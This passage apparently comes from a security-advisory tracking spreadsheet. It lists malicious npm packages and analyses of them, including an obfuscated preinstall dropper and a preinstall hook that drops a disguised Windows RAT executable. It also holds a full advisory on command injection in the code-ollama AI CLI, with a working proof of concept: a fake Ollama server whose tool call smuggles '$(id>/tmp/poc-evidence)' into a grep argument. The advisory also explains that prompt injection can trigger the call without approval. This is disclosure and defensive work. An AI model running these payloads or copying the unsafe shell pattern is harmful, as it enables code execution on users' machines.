## Source: amazon-inspector (07debd960454b52639fee783e21c0c303702d8dce6de5e3320393f1b0abc7077)
package.json declares scripts.preinstall = 'node preinstall.cjs'. preinstall.cjs is a single ~232KB opaque Function(...) invocation containing a custom PRNG-based string decoder (VnDKxn using constants 0x9e3779b9, 0x243f6a88, 0x6a09e667, 0x7f4a7c15) and a ciphertext table (KWlywdS) that is XOR-reconstructed at runtime via Tr8b5jD into executable code. The visible source contains no readable build logic; the entire install-time behavior is materialized from the decoded blob. This is the canonical npm install-time RCE dropper shape: an author-controlled preinstall hook whose destinations, commands, and payload are all hidden behind runtime decoding, executing on the installer's machine at `npm install` time before the user has run any package code. The shipped main module (nebula.js) is a thin AI-client wrapper hardcoding baseUrl https://api.nebulaai.dev/v2, disproportionately small compared to the obfuscated install script, and functions as a cover surface unrelated to the preinstall payload.
## Source: ghsa-malware (8e5df52f8d9581ab8db82a19ed61221cea9967ba53897bb4278838d6ef50063c)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75" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17220</t>
        </is>
      </c>
    </row>
    <row r="376">
      <c r="A376" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B376" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C376" s="5" t="inlineStr">
        <is>
          <t>GHSA-456v-xq2p-r4cj</t>
        </is>
      </c>
      <c r="D376" s="5" t="inlineStr"/>
      <c r="E376" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F376" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G376" s="5" t="inlineStr"/>
      <c r="H376" s="5" t="inlineStr"/>
      <c r="I376" s="5" t="inlineStr"/>
      <c r="J376" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K376" s="5" t="inlineStr"/>
      <c r="L376" s="5" t="inlineStr">
        <is>
          <t>npm:code-ollama</t>
        </is>
      </c>
      <c r="M376" s="5" t="inlineStr">
        <is>
          <t>0.36.1</t>
        </is>
      </c>
      <c r="N376" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O376" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P376" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q376" s="5" t="inlineStr"/>
      <c r="R376" s="5" t="inlineStr"/>
      <c r="S376" s="5" t="inlineStr">
        <is>
          <t>## `grep_search` Command Injection via Unescaped `$()` Shell Substitution (CWE-78)
### Summary
The `grep_search` tool in `code-ollama` constructs a shell command string by interpolating attacker-controlled `pattern` and `path` arguments, then executes it via `child_process.exec()`. The sanitization only escapes backslashes and double-quote characters, leaving `$()` command substitution and backtick expansion fully intact. A malicious or compromised Ollama server can therefore inject and execute arbitrary OS commands with the privileges of the local user running `code-ollama`. Because `grep_search` is classified as a read-only tool, it auto-executes in Plan mode without any user approval prompt, making this a no-interaction-required exploitation path. Severity is **High (CVSS 7.8)**.
### Details
**Vulnerable sink — `src/utils/tools/filesystem/grep.ts:58-66`**
```ts
const escapedPattern = searchPattern
  .replace(/\\/g, '\\\\')
  .replace(/"/g, '\\"');
const escapedDirPath = dirPath.replace(/\\/g, '\\\\').replace(/"/g, '\\"');
const { stdout } = await execShell(
  `rg --line-number --no-heading --smart-case "${escapedPattern}" "${escapedDirPath}"`,
);
```
Only `\` and `"` are neutralized. The shell metacharacter sequence `$()` (and backtick-style `` ` `` substitution) is passed through unmodified. The resulting string is passed to `execShell()` (`src/utils/tools/shell.ts:46-49`), which calls `exec` — the promisified `child_process.exec` defined at `src/utils/node.ts:1-4` — causing `/bin/sh` to interpret the entire string and expand any embedded command substitution.
**Full data-flow path (source → sink)**
| Step | Location | Action |
|------|----------|--------|
| 1 | `src/utils/ollama.ts:102-103` | External Ollama chat stream delivers `chunk.message.tool_calls` to the CLI |
| 2 | `src/cli.ts:147-148` | Each `toolCall` is forwarded to `tools.executeToolCall()` |
| 3 | `src/utils/tools/dispatcher.ts:300-306` | Dispatcher normalizes the call and routes it |
| 4 | `src/utils/tools/dispatcher.ts:392-393` | `stringArgs.pattern` and `stringArgs.path` are passed verbatim to `grepSearch()` |
| 5 | `src/utils/tools/filesystem/grep.ts:58-63` | Incomplete sanitization: only `\` and `"` are escaped (**root cause**) |
| 6 | `src/utils/tools/filesystem/grep.ts:65` | Shell command string assembled and handed to `execShell()` (**sink**) |
| 7 | `src/utils/tools/shell.ts:46-49` → `src/utils/node.ts:1-4` | `exec()` (`child_process.exec`) executes the string via `/bin/sh` |
**Approval-bypass amplifier**
`grep_search` is listed in `READ_TOOL_NAMES` at `src/constants/tool.ts:14-20` and is exposed in Plan mode at `src/utils/tools/definitions.ts:225-228`. Read-only tools execute automatically without presenting an approval prompt to the user, so exploitation requires zero user interaction beyond the initial `code-ollama run` invocation.
### PoC
**Prerequisites**
- `code-ollama` v0.36.0 installed (e.g., `npm install --global code-ollama@0.36.0` or built from source via the Dockerfile below).
- `ripgrep` (`rg`) available in `PATH` (the vulnerable code path requires it).
- Python 3 available to run the fake Ollama server.
**Step 1 — Build the self-contained Docker image (recommended)**
```sh
# From the report root directory (where vuln-001/ lives)
docker build -t vuln001-code-ollama -f vuln-001/Dockerfile .
docker run --rm vuln001-code-ollama
```
The container automatically runs `poc.py` as `CMD`. Successful exploitation prints:
```
[+] EXPLOITATION CONFIRMED
[+] Marker file : /tmp/poc-evidence
[+] Contents    : 'uid=0(root) gid=0(root) groups=0(root)'
```
**Step 2 — Manual reproduction (bare-metal)**
```sh
# Terminal 1 — start the malicious Ollama server
cat &gt; /tmp/fake-ollama.py &lt;&lt;'PY'
from http.server import BaseHTTPRequestHandler, HTTPServer
import json, sys, threading
_req = 0
_lock = threading.Lock()
class H(BaseHTTPRequestHandler):
    def log_message(self, *a): pass
    def do_GET(self):
        self.send_response(200); self.end_headers()
        self.wfile.write(b"Ollama is running")
    def do_POST(self):
        global _req
        l = int(self.headers.get("Content-Length", 0))
        self.rfile.read(l)
        with _lock:
            _req += 1; n = _req
        self.send_response(200)
        self.send_header("Content-Type", "application/x-ndjson")
        self.end_headers()
        if n == 1:
            chunk = {"model":"fake","message":{"role":"assistant","content":"",
                "tool_calls":[{"function":{"name":"grep_search",
                    "arguments":{"pattern":"$(id&gt;/tmp/poc-evidence)","path":"/tmp"}}}]},
                "done":True,"done_reason":"stop"}
        else:
            chunk = {"model":"fake","message":{"role":"assistant","content":"Done."},
                "done":True,"done_reason":"stop"}
        self.wfile.write((json.dumps(chunk)+"\n").encode())
        self.wfile.flush()
HTTPServer(("127.0.0.1", 11434), H).serve_forever()
PY
python3 /tmp/fake-ollama.py &amp;
# Terminal 2 — run code-ollama against the fake server
rm -f /tmp/poc-evidence
OLLAMA_HOST=http://127.0.0.1:11434 code-ollama run --trust fake "search the code"
cat /tmp/poc-evidence   # expected: uid=... gid=... groups=...
```
**Explanation of the payload**
The `pattern` argument value `$(id&gt;/tmp/poc-evidence)` survives the sanitization in `grep.ts:58-63` because only `\` and `"` are stripped. When the resulting shell string
```
rg --line-number --no-heading --smart-case "$(id&gt;/tmp/poc-evidence)" "/tmp"
```
is executed by `/bin/sh` via `child_process.exec`, the shell expands `$()` first, running `id` and writing its output to `/tmp/poc-evidence` before `rg` ever starts.
**Remediation**
Replace the shell-string construction with an argument-vector call to avoid the shell entirely:
```diff
-import { execShell } from '../shell';
+import { execFile } from '../../node';
+
+const RG_EXEC_OPTIONS = { timeout: 30_000, maxBuffer: 1024 * 1024 };
-      const escapedPattern = searchPattern
-        .replace(/\\/g, '\\\\')
-        .replace(/"/g, '\\"');
-      const escapedDirPath = dirPath
-        .replace(/\\/g, '\\\\')
-        .replace(/"/g, '\\"');
-
-      const { stdout } = await execShell(
-        `rg --line-number --no-heading --smart-case "${escapedPattern}" "${escapedDirPath}"`,
-      );
+      const { stdout } = await execFile(
+        'rg',
+        ['--line-number', '--no-heading', '--smart-case', '--', searchPattern, dirPath],
+        RG_EXEC_OPTIONS,
+      );
```
### Impact
This is an **OS Command Injection** vulnerability (CWE-78). Any party that controls the Ollama server response — including a rogue model backend, a prompt-injection payload that manipulates the model into issuing a crafted `grep_search` tool call, or a network adversary performing a man-in-the-middle attack on an unencrypted `OLLAMA_HOST` connection — can execute arbitrary commands as the OS user running `code-ollama`.
Impact scope:
- **Confidentiality (High)** — attacker can read any file accessible to the user, exfiltrate source code, secrets, SSH keys, etc.
- **Integrity (High)** — attacker can modify or delete files, plant backdoors, alter repository history.
- **Availability (High)** — attacker can terminate processes, corrupt data, or consume system resources.
The approval-bypass via `READ_TOOL_NAMES` / Plan-mode auto-execution means the attack completes silently with no user interaction after `code-ollama run` is invoked. Developers, CI pipelines, and IDE-integrated users who run `code-ollama` in trusted directories are all at risk.
### Reproduction artifacts
#### `Dockerfile`
```dockerfile
# VULN-001: grep_search Command Injection — CWE-78
# Target: ai-action/code-ollama v0.36.0
# Proof-of-concept Docker image: builds the repo and runs poc.py
#
# Build (from project root):
#   docker build -t vuln001-code-ollama -f vuln-001/Dockerfile .
# Run:
#   docker run --rm vuln001-code-ollama
FROM node:24-slim
# ripgrep  — required by grepSearch() in the vulnerable code path
# python3  — runs poc.py orchestration script
RUN apt-get update &amp;&amp; apt-get install -y \
    ripgrep \
    python3 \
    --no-install-recommends \
 &amp;&amp; rm -rf /var/lib/apt/lists/*
# ── Install Node dependencies ──────────────────────────────────────────────────
WORKDIR /app
COPY repo/package.json repo/package-lock.json ./
# Install ALL deps (devDeps needed for vite build / tsx fallback)
RUN npm ci
# ── Copy source and build ──────────────────────────────────────────────────────
COPY repo/ ./
# Produces /app/dist/cli.js — the bundled CLI entrypoint
RUN npm run build
# ── Runtime setup ─────────────────────────────────────────────────────────────
# code-ollama writes config to ~/.code-ollama; pre-create to avoid mkdir race
RUN mkdir -p /root/.code-ollama /workspace
COPY vuln-001/poc.py /poc.py
WORKDIR /workspace
CMD ["python3", "/poc.py"]
```
#### `poc.py`
```python
#!/usr/bin/env python3
"""
Proof of Concept: VULN-001 — grep_search Command Injection (CWE-78)
Repository : ai-action/code-ollama v0.36.0
Sink       : src/utils/tools/filesystem/grep.ts:65
             execShell(`rg ... "${escapedPattern}" "${escapedDirPath}"`)
Attack path: malicious Ollama server -&gt; tool_call.arguments.pattern
             -&gt; grepSearch() -&gt; execShell() -&gt; child_process.exec()
Only `\\` and `"` are escaped; `$()` command substitution is NOT neutralized.
This PoC demonstrates that a rogue Ollama server can inject arbitrary shell
commands that execute as the local user running code-ollama.
Usage (inside Docker, called automatically by CMD):
    python3 /poc.py
Expected outcome:
    /tmp/poc-evidence is created with content matching INJECTED_CMD output.
"""
import json
import os
import subprocess
import sys
import threading
import time
from http.server import BaseHTTPRequestHandler, HTTPServer
# ---------------------------------------------------------------------------
# Configuration
# ---------------------------------------------------------------------------
FAKE_SERVER_HOST = "127.0.0.1"
FAKE_SERVER_PORT = 11434
# The marker file written by the injected command — used as exploitation proof
MARKER_FILE = "/tmp/poc-evidence"
# Payload: $() command substitution that is NOT escaped by code-ollama's
# sanitization (only \\ and " are escaped, leaving $() intact).
# Writes output of `id` to MARKER_FILE to capture the running UID/GID.
INJECTED_CMD = f"$(id&gt;{MARKER_FILE})"
# Path argument for grep_search (must be a valid non-empty string)
TARGET_PATH = "/workspace"
# Tracks how many POST requests the fake server has received
_request_count = 0
_request_lock = threading.Lock()
# ---------------------------------------------------------------------------
# Fake Ollama HTTP server
# ---------------------------------------------------------------------------
class FakeOllamaHandler(BaseHTTPRequestHandler):
    """Minimal Ollama-compatible HTTP server for the PoC.
    First POST /api/chat  -&gt; returns a grep_search tool_call carrying the
                             injected pattern.
    Subsequent POSTs      -&gt; return a plain done response to terminate the
                             code-ollama tool-loop.
    """
    def log_message(self, fmt, *args):  # suppress default request logging
        pass
    # ------------------------------------------------------------------
    # GET — health-check (code-ollama / ollama-npm may call GET /)
    # ------------------------------------------------------------------
    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(b"Ollama is running")
    # ------------------------------------------------------------------
    # POST — chat streaming endpoint
    # ------------------------------------------------------------------
    def do_POST(self):
        global _request_count
        # Consume request body to avoid broken-pipe on the client side
        content_length = int(self.headers.get("Content-Length", 0))
        _ = self.rfile.read(content_length)
        with _request_lock:
            _request_count += 1
            current_request = _request_count
        self.send_response(200)
        self.send_header("Content-Type", "application/x-ndjson")
        self.end_headers()
        if current_request == 1:
            # ---------------------------------------------------------------
            # First request: inject malicious grep_search tool call
            # The `arguments` object is passed verbatim through the ollama-npm
            # library and reaches grepSearch(pattern, path) in grep.ts.
            # ---------------------------------------------------------------
            print(f"[fake-ollama] Request #{current_request}: "
                  f"sending malicious grep_search tool_call")
            sys.stdout.flush()
            chunk = {
                "model": "fake",
                "message": {
                    "role": "assistant",
                    "content": "",
                    "tool_calls": [{
                        "function": {
                            "name": "grep_search",
                            # pattern and path are the two required string args
                            # validated by validateArgs() in dispatcher.ts
                            "arguments": {
                                "pattern": INJECTED_CMD,
                                "path": TARGET_PATH,
                            },
                        }
                    }],
                },
                "done": True,
                "done_reason": "stop",
            }
        else:
            # ---------------------------------------------------------------
            # Subsequent requests: plain text to terminate the tool loop.
            # No tool_calls -&gt; nextMessages stays null -&gt; processRunStream
            # returns after checking hasUncalledToolIntent (no match on
            # "Done.") so the CLI exits cleanly.
            # ---------------------------------------------------------------
            print(f"[fake-ollama] Request #{current_request}: "
                  "sending done/stop response")
            sys.stdout.flush()
            chunk = {
                "model": "fake",
                "message": {
                    "role": "assistant",
                    "content": "Done.",
                },
                "done": True,
                "done_reason": "stop",
            }
        self.wfile.write((json.dumps(chunk) + "\n").encode())
        self.wfile.flush()
def start_fake_server():
    """Start the fake Ollama server in a daemon thread."""
    server = HTTPServer((FAKE_SERVER_HOST, FAKE_SERVER_PORT), FakeOllamaHandler)
    thread = threading.Thread(target=server.serve_forever, daemon=True)
    thread.start()
    return server
# ---------------------------------------------------------------------------
# Main orchestration
# ---------------------------------------------------------------------------
def main():
    print("=" * 65)
    print("VULN-001: grep_search Command Injection PoC (CWE-78)")
    print("Target : ai-action/code-ollama v0.36.0")
    print("Sink   : src/utils/tools/filesystem/grep.ts:65")
    print("=" * 65)
    print()
    print(f"[*] Payload  : {INJECTED_CMD}")
    print(f"[*] Marker   : {MARKER_FILE}")
    print()
    # Clean up any leftover marker from a previous run
    if os.path.exists(MARKER_FILE):
        os.unlink(MARKER_FILE)
        print(f"[*] Removed stale marker file: {MARKER_FILE}")
    # -----------------------------------------------------------------------
    # 1. Start the fake Ollama server
    # -----------------------------------------------------------------------
    print(f"[*] Starting fake Ollama server on "
          f"{FAKE_SERVER_HOST}:{FAKE_SERVER_PORT} ...")
    start_fake_server()
    time.sleep(0.4)   # give the server socket time to bind
    # -----------------------------------------------------------------------
    # 2. Run code-ollama with OLLAMA_HOST pointing to the fake server
    #    --trust skips the interactive directory-trust prompt (src/cli.ts:214)
    # -----------------------------------------------------------------------
    env = os.environ.copy()
    env["OLLAMA_HOST"] = f"http://{FAKE_SERVER_HOST}:{FAKE_SERVER_PORT}"
    # Use the compiled CLI bundle produced by `npm run build` in the Dockerfile
    cmd = [
        "node", "/app/dist/cli.js",
        "run", "--trust", "fake", "search the code",
    ]
    print(f"[*] Executing: {' '.join(cmd)}")
    print(f"[*] OLLAMA_HOST={env['OLLAMA_HOST']}")
    print()
    try:
        result = subprocess.run(
            cmd,
            env=env,
            stdin=subprocess.DEVNULL,   # no TTY / interactive input needed
            capture_output=True,
            text=True,
            timeout=60,
            cwd="/workspace",
        )
    except subprocess.TimeoutExpired:
        print("[-] code-ollama subprocess timed out after 60 s")
        sys.exit(1)
    print("--- code-ollama stdout ---")
    print(result.stdout[:3000] if result.stdout else "(empty)")
    print("--- code-ollama stderr ---")
    print(result.stderr[:3000] if result.stderr else "(empty)")
    print(f"--- exit code: {result.returncode} ---")
    print()
    # -----------------------------------------------------------------------
    # 3. Verify exploitation: check for the marker file
    # -----------------------------------------------------------------------
    if os.path.exists(MARKER_FILE):
        evidence = open(MARKER_FILE).read().strip()
        print("[+] ============================================================")
        print("[+] EXPLOITATION CONFIRMED")
        print("[+] ============================================================")
        print(f"[+] Marker file : {MARKER_FILE}")
        print(f"[+] Contents    : {evidence!r}")
        print("[+] Explanation : The $() command substitution inside the")
        print("[+]   grep_search pattern was NOT escaped by code-ollama's")
        print("[+]   sanitizer (grep.ts:58-63 only strips \\ and \").")
        print("[+]   execShell() passed the raw string to child_process.exec()")
        print("[+]   which ran it through /bin/sh, executing the injected")
        print("[+]   command as the current user.")
        print("[+] ============================================================")
        sys.exit(0)
    else:
        print("[-] ============================================================")
        print("[-] EXPLOITATION FAILED")
        print(f"[-] Expected marker file NOT found: {MARKER_FILE}")
        print("[-] Possible causes:")
        print("[-]   - ollama-npm parsed tool_call.arguments differently")
        print("[-]   - The pattern was sanitized before reaching execShell()")
        print("[-]   - ripgrep is not installed so the fallback path was taken")
        print("[-]   - The shell used does not support $() substitution")
        print("[-] ============================================================")
        sys.exit(1)
if __name__ == "__main__":
    main()
```</t>
        </is>
      </c>
      <c r="T376" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-456v-xq2p-r4cj</t>
        </is>
      </c>
    </row>
    <row r="377">
      <c r="A377" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B377" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C377" s="5" t="inlineStr">
        <is>
          <t>GHSA-65gf-jmp3-4wrc</t>
        </is>
      </c>
      <c r="D377" s="5" t="inlineStr"/>
      <c r="E377" s="5" t="inlineStr"/>
      <c r="F377" s="5" t="inlineStr"/>
      <c r="G377" s="5" t="inlineStr"/>
      <c r="H377" s="5" t="inlineStr"/>
      <c r="I377" s="5" t="inlineStr"/>
      <c r="J377" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K377" s="5" t="inlineStr"/>
      <c r="L377" s="5" t="inlineStr">
        <is>
          <t>npm:wbnr-probe-visible-check</t>
        </is>
      </c>
      <c r="M377" s="5" t="inlineStr"/>
      <c r="N377" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O377" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P377" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q377" s="5" t="inlineStr"/>
      <c r="R377" s="5" t="inlineStr"/>
      <c r="S377" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (a1f50ae8c3560fd6aedcceecf9e5289ed72c06bd746e21c4925b402c5d1ef3f9)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77" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17212</t>
        </is>
      </c>
    </row>
    <row r="378">
      <c r="A378" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B378" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C378" s="5" t="inlineStr">
        <is>
          <t>GHSA-865f-pwj5-p2c5</t>
        </is>
      </c>
      <c r="D378" s="5" t="inlineStr"/>
      <c r="E378" s="5" t="inlineStr"/>
      <c r="F378" s="5" t="inlineStr"/>
      <c r="G378" s="5" t="inlineStr"/>
      <c r="H378" s="5" t="inlineStr"/>
      <c r="I378" s="5" t="inlineStr"/>
      <c r="J378" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K378" s="5" t="inlineStr"/>
      <c r="L378" s="5" t="inlineStr">
        <is>
          <t>npm:@wbnr/design-kit</t>
        </is>
      </c>
      <c r="M378" s="5" t="inlineStr"/>
      <c r="N378" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O378" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P378" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q378" s="5" t="inlineStr"/>
      <c r="R378" s="5" t="inlineStr"/>
      <c r="S378" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (c3b05ae1cf2f1c184b793a46f4bebd59f7945ef1f671c4e6bd64ee946c416e2b)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78" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17204</t>
        </is>
      </c>
    </row>
    <row r="379">
      <c r="A379" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B379" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C379" s="5" t="inlineStr">
        <is>
          <t>GHSA-94r6-cxjq-fq4r</t>
        </is>
      </c>
      <c r="D379" s="5" t="inlineStr"/>
      <c r="E379" s="5" t="inlineStr"/>
      <c r="F379" s="5" t="inlineStr"/>
      <c r="G379" s="5" t="inlineStr"/>
      <c r="H379" s="5" t="inlineStr"/>
      <c r="I379" s="5" t="inlineStr"/>
      <c r="J379" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K379" s="5" t="inlineStr"/>
      <c r="L379" s="5" t="inlineStr">
        <is>
          <t>npm:@wbnr/lottiefiles-loader</t>
        </is>
      </c>
      <c r="M379" s="5" t="inlineStr"/>
      <c r="N379" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O379" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P379" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q379" s="5" t="inlineStr"/>
      <c r="R379" s="5" t="inlineStr"/>
      <c r="S379" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (2f4124e4c91354a00657c25874fb6b9f762438eee2ecd1d8b686af3d4d4ea8c9)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79" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17205</t>
        </is>
      </c>
    </row>
    <row r="380">
      <c r="A380" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B380" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C380" s="5" t="inlineStr">
        <is>
          <t>GHSA-9f7c-6fp7-9g6x</t>
        </is>
      </c>
      <c r="D380" s="5" t="inlineStr"/>
      <c r="E380" s="5" t="inlineStr"/>
      <c r="F380" s="5" t="inlineStr"/>
      <c r="G380" s="5" t="inlineStr"/>
      <c r="H380" s="5" t="inlineStr"/>
      <c r="I380" s="5" t="inlineStr"/>
      <c r="J380" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K380" s="5" t="inlineStr"/>
      <c r="L380" s="5" t="inlineStr">
        <is>
          <t>npm:kjj81</t>
        </is>
      </c>
      <c r="M380" s="5" t="inlineStr"/>
      <c r="N380" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O380" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P380" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q380" s="5" t="inlineStr"/>
      <c r="R380" s="5" t="inlineStr"/>
      <c r="S380" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (73eb4923beefd1002ed194dadf8c7712ed082fbd0d9dcdfba1db3a02e1fa82ef)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80" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17207</t>
        </is>
      </c>
    </row>
    <row r="381">
      <c r="A381" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B381" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C381" s="5" t="inlineStr">
        <is>
          <t>GHSA-cxrh-669r-w2g9</t>
        </is>
      </c>
      <c r="D381" s="5" t="inlineStr"/>
      <c r="E381" s="5" t="inlineStr"/>
      <c r="F381" s="5" t="inlineStr"/>
      <c r="G381" s="5" t="inlineStr"/>
      <c r="H381" s="5" t="inlineStr"/>
      <c r="I381" s="5" t="inlineStr"/>
      <c r="J381" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K381" s="5" t="inlineStr"/>
      <c r="L381" s="5" t="inlineStr">
        <is>
          <t>npm:tailwindcss-form-kit</t>
        </is>
      </c>
      <c r="M381" s="5" t="inlineStr"/>
      <c r="N381" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O381" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P381" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q381" s="5" t="inlineStr"/>
      <c r="R381" s="5" t="inlineStr"/>
      <c r="S381" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (db00b593e7fc0c9c362e06fce588b1fa25a695114032504a7d6c72f5141f39ae)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81" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17221</t>
        </is>
      </c>
    </row>
    <row r="382">
      <c r="A382" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B382" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C382" s="5" t="inlineStr">
        <is>
          <t>GHSA-fm5g-6rr8-p9vq</t>
        </is>
      </c>
      <c r="D382" s="5" t="inlineStr"/>
      <c r="E382" s="5" t="inlineStr"/>
      <c r="F382" s="5" t="inlineStr"/>
      <c r="G382" s="5" t="inlineStr"/>
      <c r="H382" s="5" t="inlineStr"/>
      <c r="I382" s="5" t="inlineStr"/>
      <c r="J382" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K382" s="5" t="inlineStr"/>
      <c r="L382" s="5" t="inlineStr">
        <is>
          <t>npm:nebula-sdk</t>
        </is>
      </c>
      <c r="M382" s="5" t="inlineStr"/>
      <c r="N382" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O382" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P382" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q382" s="5" t="inlineStr"/>
      <c r="R382" s="5" t="inlineStr"/>
      <c r="S382" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (f0ca45fda7abd51edfeef37be6d19b4070788180b7625f16354223d81dae4d45)
The preinstall.cjs lifecycle script embeds a base64-encoded, zlib-compressed Windows PE (~257KB) as a string literal. On `npm install`, the script decodes and decompresses the blob, writes the resulting executable to %LOCALAPPDATA%\Microsoft\Conhost\conhost.exe (masquerading as the legitimate Windows conhost binary), and spawns it detached with stdio ignored and windowsHide set to true, executing attacker-controlled native code on the installer's Windows machine with no user interaction. Decoded payload strings reference github.com/syskiel/kntrat-e and the IP 65.87.7.132, consistent with a native RAT-family tool. The package's advertised purpose is an AI SDK; a bundled native Windows executable dropped at install time is unrelated to that purpose and is delivered through multi-layer obfuscation (base64 + zlib + string-literal embedding) inside the lifecycle hook.
## Source: ghsa-malware (6173d4941c91c361332072d4542cc10d3cefb945bc40a75ab83e07ffdc2fdb77)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82" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17219</t>
        </is>
      </c>
    </row>
    <row r="383">
      <c r="A383" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B383" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C383" s="5" t="inlineStr">
        <is>
          <t>GHSA-jhjp-4c2q-xmx4</t>
        </is>
      </c>
      <c r="D383" s="5" t="inlineStr"/>
      <c r="E383" s="5" t="inlineStr"/>
      <c r="F383" s="5" t="inlineStr"/>
      <c r="G383" s="5" t="inlineStr"/>
      <c r="H383" s="5" t="inlineStr"/>
      <c r="I383" s="5" t="inlineStr"/>
      <c r="J383" s="5" t="inlineStr">
        <is>
          <t>github, go, gin</t>
        </is>
      </c>
      <c r="K383" s="5" t="inlineStr"/>
      <c r="L383" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/falcosecurity/plugins/plugins/k8saudit, Go:github.com/falcosecurity/plugins/plugins/k8saudit-aks, Go:github.com/falcosecurity/plugins/plugins/k8saudit-eks, Go:github.com/falcosecurity/plugins/plugins/k8saudit-gke, Go:github.com/falcosecurity/plugins/plugins/k8saudit-ovh</t>
        </is>
      </c>
      <c r="M383" s="5" t="inlineStr">
        <is>
          <t>0.12.0, 0.18.0, 0.6.0, 0.9.0</t>
        </is>
      </c>
      <c r="N383" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O383" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P383" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
